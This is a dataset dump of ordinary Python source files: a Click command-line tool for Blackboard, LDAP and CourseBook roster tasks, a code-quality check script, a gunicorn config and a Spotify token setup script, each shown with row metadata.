def cli_blackboard_upload(netid, get_password, link_text, path):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=path)
@cli_blackboard.command(name='webassign', help='WebAssign')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
@cli_blackboard.command(name='combo', help='Combine the other commands')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.option('--upload', type=click.Path(exists=True), default=None, help="CSV to upload.")
@click.option('--webassign/--no-webassign', default=False, help="Export/import WebAssign.")
@click.option('--download/--no-download', default=True, help="Download CSV.")
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text, upload, webassign, download):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
if not (upload is None):
blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=upload)
if webassign:
blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
if download:
x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
_echo_item(x)
from . import ldap
@cli.group(name='ldap')
def cli_ldap():
pass
@cli_ldap.command(name='filter', help='LDAP search with user-specified filter.')
@click.argument('filter', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_filter(filter, keys):
rows = list(ldap.filter(filter), list(keys))
_echo_table(rows)
@cli_ldap.command(name='search', help='Perform an LDAP search with filter: .' + ldap.SEARCH_FILTER)
@click.argument('term', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_search(term, keys):
rows = list(ldap.search(term, list(keys)))
_echo_table(rows)
@cli_ldap.command(name='netid', help='Filter by NetID')
@click.argument('netid', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid(netid, keys):
row = ldap.netid(netid, list(keys))
_echo_row(row)
@cli_ldap.command(name='alias', help='Filter by alias/PEA')
@click.argument('alias', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias(alias, keys):
row = ldap.alias(alias, list(keys))
_echo_row(row)
@cli_ldap.command(name='netid-to-alias', help='NetID -> alias/PEA')
@click.argument('netid', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid_to_alias(netid):
x = ldap.netid_to_alias(netid)
_echo_item(x)
@cli_ldap.command(name='alias-to-netid', help='alias -> NetID')
@click.argument('alias', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias_to_netid(alias):
x = ldap.alias_to_netid(alias)
_echo_item(x)
import os
import shutil
from . import coursebook
@cli.group(name='coursebook')
def cli_coursebook():
pass
@cli_coursebook.group(name='db')
def cli_coursebook_db():
pass
@cli_coursebook_db.command(name='update')
def cli_coursebook_db_update():
coursebook.db_update()
@cli_coursebook_db.command(name='netid-to-address')
@click.argument('netid', type=click.STRING)
def cli_coursebook_db_netid_to_address(netid):
X = list(coursebook.db_netid_to_address(netid))
_echo_item(' '.join(X))
@cli_coursebook.group(name='roster')
def cli_coursebook_roster():
pass
@cli_coursebook_roster.command(name='xlsx-to-csv', help='Convert a CourseBook roster XLSX to CSV.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.argument('source', type=click.Path(exists=True))
@click.argument('target', type=click.Path())
def cli_coursebook_xlsx_to_csv(force, source, target):
if os.path.exists(target) and not force:
raise click.ClickException('File exists, maybe use --force?: ' + target)
coursebook.roster_xlsx_to_csv(source, target)
@cli_coursebook_roster.group(name='download')
def cli_coursebook_roster_download():
pass
@cli_coursebook_roster.command(name='download', help='Download a CourseBook roster.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.option('--new/--no-new', default=False, help="Get a new file (don't use the cache).")
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('address', nargs=-1, type=click.STRING)
def cli_coursebook_roster_download(netid, get_password, new, force, address):
def _split(x):
y, f = os.path.splitext(x)
return y, f[1:]
for x in address:
_, f = _split(x)
if not (f in coursebook.ROSTER_FORMAT):
raise click.ClickException("{x}: I don't know how to download a `{f}`, only: {these}.".format(x=x, f=f, these=' '.join(coursebook.ROSTER_FORMAT)))
# FIXME: check for proper address format
if os.path.exists(x) and not force:
raise click.ClickException('File exists, maybe use --force?: ' + x)
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
if netid is None:
raise click.ClickException('You must either specify a NetID in {config} or with --netid.'.format(config.CONFIG_FILE))
for x in address:
y, f = _split(x)
z = coursebook.roster_download(netid=netid, get_password=get_password, address=y, format=f, new=new)
shutil.copyfile(z, x)
| 34.108 | 158 | 0.72546 |
from prettytable import PrettyTable
from collections import OrderedDict
def _fieldnames(rows):
def g():
for row in rows:
yield from row
d = OrderedDict((k, None) for k in g())
return list(d.keys())
def _echo_table(rows):
if not rows: return
fieldnames = _fieldnames(rows)
table = PrettyTable(fieldnames)
table.align = 'l'
for row in rows:
table.add_row([row[k] or '' for k in fieldnames])
click.echo(table.get_string())
def _echo_row(row):
if not row: return
table = PrettyTable(row.keys())
table.align = 'l'
table.add_row(row.values())
click.echo(table.get_string())
def _echo_item(x):
if not x: return
click.echo(x)
import os
import logging
import click
import click_log
from . import config
_logger = logging.getLogger(__name__)
click_log.basic_config(_logger)
@click.group()
def cli():
pass
from . import blackboard
@cli.group(name='blackboard')
def cli_blackboard():
pass
@cli_blackboard.command(name='download', help='Download')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_download(netid, get_password, link_text):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
_echo_item(x)
@cli_blackboard.command(name='upload', help='Upload')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click.argument('path', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_upload(netid, get_password, link_text, path):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=path)
@cli_blackboard.command(name='webassign', help='WebAssign')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
@cli_blackboard.command(name='combo', help='Combine the other commands')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.option('--upload', type=click.Path(exists=True), default=None, help="CSV to upload.")
@click.option('--webassign/--no-webassign', default=False, help="Export/import WebAssign.")
@click.option('--download/--no-download', default=True, help="Download CSV.")
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_webassign(netid, get_password, link_text, upload, webassign, download):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
if not (upload is None):
blackboard.upload(netid=netid, get_password=get_password, link_text=link_text, path=upload)
if webassign:
blackboard.webassign(netid=netid, get_password=get_password, link_text=link_text)
if download:
x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
_echo_item(x)
from . import ldap
@cli.group(name='ldap')
def cli_ldap():
pass
@cli_ldap.command(name='filter', help='LDAP search with user-specified filter.')
@click.argument('filter', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_filter(filter, keys):
rows = list(ldap.filter(filter), list(keys))
_echo_table(rows)
@cli_ldap.command(name='search', help='Perform an LDAP search with filter: .' + ldap.SEARCH_FILTER)
@click.argument('term', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_search(term, keys):
rows = list(ldap.search(term, list(keys)))
_echo_table(rows)
@cli_ldap.command(name='netid', help='Filter by NetID')
@click.argument('netid', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid(netid, keys):
row = ldap.netid(netid, list(keys))
_echo_row(row)
@cli_ldap.command(name='alias', help='Filter by alias/PEA')
@click.argument('alias', type=click.STRING)
@click.argument('keys', nargs=-1, type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias(alias, keys):
row = ldap.alias(alias, list(keys))
_echo_row(row)
@cli_ldap.command(name='netid-to-alias', help='NetID -> alias/PEA')
@click.argument('netid', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_netid_to_alias(netid):
x = ldap.netid_to_alias(netid)
_echo_item(x)
@cli_ldap.command(name='alias-to-netid', help='alias -> NetID')
@click.argument('alias', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_ldap_alias_to_netid(alias):
x = ldap.alias_to_netid(alias)
_echo_item(x)
import os
import shutil
from . import coursebook
@cli.group(name='coursebook')
def cli_coursebook():
pass
@cli_coursebook.group(name='db')
def cli_coursebook_db():
pass
@cli_coursebook_db.command(name='update')
def cli_coursebook_db_update():
coursebook.db_update()
@cli_coursebook_db.command(name='netid-to-address')
@click.argument('netid', type=click.STRING)
def cli_coursebook_db_netid_to_address(netid):
X = list(coursebook.db_netid_to_address(netid))
_echo_item(' '.join(X))
@cli_coursebook.group(name='roster')
def cli_coursebook_roster():
pass
@cli_coursebook_roster.command(name='xlsx-to-csv', help='Convert a CourseBook roster XLSX to CSV.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.argument('source', type=click.Path(exists=True))
@click.argument('target', type=click.Path())
def cli_coursebook_xlsx_to_csv(force, source, target):
if os.path.exists(target) and not force:
raise click.ClickException('File exists, maybe use --force?: ' + target)
coursebook.roster_xlsx_to_csv(source, target)
@cli_coursebook_roster.group(name='download')
def cli_coursebook_roster_download():
pass
@cli_coursebook_roster.command(name='download', help='Download a CourseBook roster.')
@click.option('--force/--no-force', default=False, help="Overwrite existing file.")
@click.option('--new/--no-new', default=False, help="Get a new file (don't use the cache).")
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('address', nargs=-1, type=click.STRING)
def cli_coursebook_roster_download(netid, get_password, new, force, address):
def _split(x):
y, f = os.path.splitext(x)
return y, f[1:]
for x in address:
_, f = _split(x)
if not (f in coursebook.ROSTER_FORMAT):
raise click.ClickException("{x}: I don't know how to download a `{f}`, only: {these}.".format(x=x, f=f, these=' '.join(coursebook.ROSTER_FORMAT)))
if os.path.exists(x) and not force:
raise click.ClickException('File exists, maybe use --force?: ' + x)
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
if netid is None:
raise click.ClickException('You must either specify a NetID in {config} or with --netid.'.format(config.CONFIG_FILE))
for x in address:
y, f = _split(x)
z = coursebook.roster_download(netid=netid, get_password=get_password, address=y, format=f, new=new)
shutil.copyfile(z, x)
| true | true |
79012480958bbdebc69a16fb38f259e850c32a78 | 2,872 | py | Python | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | null | null | null | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | 10 | 2020-03-26T14:53:29.000Z | 2021-06-10T17:21:53.000Z | check_commit.py | Cocopyth/foodshare | 1e997522b90bc11749265b7d31bea32a2bc03878 | [
"Apache-2.0"
] | null | null | null | """This script runs code quality checks on given Python files.
Note: This script assumes you use Poetry as your dependency manager.
Run the following in your terminal to get help on how to use this script:
```shell
poetry run python check_commit.py -h
```
"""
import argparse
import subprocess
from colorama import Fore, Style, deinit, init
def blue_bold(message: str) -> str:
return f'{Fore.BLUE}{Style.BRIGHT}{message}{Style.RESET_ALL}'
def light(message: str) -> str:
return f'{Style.DIM}{message}{Style.RESET_ALL}'
def run_task(task_message: str, command: str) -> None:
"""Run a task in the shell, defined by a task message and its associated
command."""
print(blue_bold(task_message))
print(light(f'$ {command}'))
subprocess.call(command, shell=True)
print()
if __name__ == '__main__':
# initialise terminal colors
init()
# create parser
parser = argparse.ArgumentParser(
description=(
f'Run code quality checks on the given Python files. By default '
f'this script runs isort, Black and Flake8 successively but you '
f'can use the parameters to selectively run some of these checks.'
),
epilog=(
'examples:\n'
'\n'
' # run all checks on the my_package/ Python package\n'
' $ poetry run python check_commit.py my_package\n'
'\n'
' # run Black and Flake8 on the la.py file and the foo/ folder\n'
' $ poetry run python check_commit.py -b -f8 la.py foo\n'
),
formatter_class=argparse.RawTextHelpFormatter,
)
# add parser arguments
parser.add_argument(
'-i',
'--isort',
help='run isort on the given files',
action='store_true',
)
parser.add_argument(
'-b',
'--black',
help='run Black on the given files',
action='store_true',
)
parser.add_argument(
'-f8',
'--flake8',
help='run Flake8 on the given files',
action='store_true',
)
parser.add_argument(
'files', type=str, nargs='+', help='list of files or directories',
)
# parse arguments
args = parser.parse_args()
# run checks
run_all_checks = not args.isort and not args.black and not args.flake8
files = ' '.join(args.files)
if run_all_checks or args.isort:
run_task(
'Run import autosorting with isort...',
f'poetry run isort -rc {files}',
)
if run_all_checks or args.black:
run_task(
'Run code formatting with Black...', f'poetry run black {files}',
)
if run_all_checks or args.flake8:
run_task(
'Run code linting with Flake8...', f'poetry run flake8 {files}',
)
# de-initialise terminal colors
deinit()
| 27.09434 | 78 | 0.605153 |
import argparse
import subprocess
from colorama import Fore, Style, deinit, init
def blue_bold(message: str) -> str:
return f'{Fore.BLUE}{Style.BRIGHT}{message}{Style.RESET_ALL}'
def light(message: str) -> str:
return f'{Style.DIM}{message}{Style.RESET_ALL}'
def run_task(task_message: str, command: str) -> None:
print(blue_bold(task_message))
print(light(f'$ {command}'))
subprocess.call(command, shell=True)
print()
if __name__ == '__main__':
init()
parser = argparse.ArgumentParser(
description=(
f'Run code quality checks on the given Python files. By default '
f'this script runs isort, Black and Flake8 successively but you '
f'can use the parameters to selectively run some of these checks.'
),
epilog=(
'examples:\n'
'\n'
' # run all checks on the my_package/ Python package\n'
' $ poetry run python check_commit.py my_package\n'
'\n'
' # run Black and Flake8 on the la.py file and the foo/ folder\n'
' $ poetry run python check_commit.py -b -f8 la.py foo\n'
),
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'-i',
'--isort',
help='run isort on the given files',
action='store_true',
)
parser.add_argument(
'-b',
'--black',
help='run Black on the given files',
action='store_true',
)
parser.add_argument(
'-f8',
'--flake8',
help='run Flake8 on the given files',
action='store_true',
)
parser.add_argument(
'files', type=str, nargs='+', help='list of files or directories',
)
args = parser.parse_args()
run_all_checks = not args.isort and not args.black and not args.flake8
files = ' '.join(args.files)
if run_all_checks or args.isort:
run_task(
'Run import autosorting with isort...',
f'poetry run isort -rc {files}',
)
if run_all_checks or args.black:
run_task(
'Run code formatting with Black...', f'poetry run black {files}',
)
if run_all_checks or args.flake8:
run_task(
'Run code linting with Flake8...', f'poetry run flake8 {files}',
)
deinit()
| true | true |
790124d3352f34e789b4be873b4a669f51d97eff | 140 | py | Python | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 10 | 2020-05-28T05:31:15.000Z | 2021-04-12T20:15:26.000Z | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 4 | 2021-06-08T21:40:48.000Z | 2022-03-12T00:32:15.000Z | gunicorn.conf.py | ShiZhuming/StyleTransfer | cba2a3ceb733a2d129d52d4a3cac07c7651bd928 | [
"MIT"
] | 1 | 2020-05-31T11:12:08.000Z | 2020-05-31T11:12:08.000Z | workers = 1 # 定义同时开启的处理请求的进程数量,根据网站流量适当调整
worker_class = "gevent" # 采用gevent库,支持异步处理请求,提高吞吐量
# bind = "0.0.0.0:80"
bind = "0.0.0.0:80"
| 28 | 52 | 0.671429 | workers = 1
worker_class = "gevent"
bind = "0.0.0.0:80"
| true | true |
790124d82caa5f08062819b100e64f56b6ee4ca7 | 648 | py | Python | spotify_setup.py | Nomad95/spotify-leds | 2774a4a66c6e2a38950875d48047d52f6c8403a9 | [
"MIT"
] | 93 | 2018-11-12T21:38:45.000Z | 2022-03-31T05:46:02.000Z | spotify_setup.py | Georgej5/Colorfy | 69e8573840df6ac9090f346256157015166620cb | [
"MIT"
] | 12 | 2019-01-28T19:17:47.000Z | 2022-03-11T23:34:50.000Z | spotify_setup.py | Georgej5/Colorfy | 69e8573840df6ac9090f346256157015166620cb | [
"MIT"
] | 9 | 2019-10-21T00:10:30.000Z | 2021-05-18T04:46:49.000Z | """Script that generates a refresh token for a specific user."""
import os
import sys
import spotipy.util as util
import json
if len(sys.argv) == 2:
username = str(sys.argv[1])
else:
print('Usage: {} username'.format(sys.argv[0]))
sys.exit(1)
scope = 'user-read-currently-playing user-read-playback-state'
# Get tokens from Spotify.
try:
util.prompt_for_user_token(username, scope)
except:
raise RuntimeError('Could not fetch token.')
# Print refresh token.
with open('.cache-{}'.format(username)) as json_file:
data = json.load(json_file)
print('Refresh token for {}: {}'.format(username, data['refresh_token']))
| 24.923077 | 77 | 0.699074 | import os
import sys
import spotipy.util as util
import json
if len(sys.argv) == 2:
username = str(sys.argv[1])
else:
print('Usage: {} username'.format(sys.argv[0]))
sys.exit(1)
scope = 'user-read-currently-playing user-read-playback-state'
try:
util.prompt_for_user_token(username, scope)
except:
raise RuntimeError('Could not fetch token.')
with open('.cache-{}'.format(username)) as json_file:
data = json.load(json_file)
print('Refresh token for {}: {}'.format(username, data['refresh_token']))
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.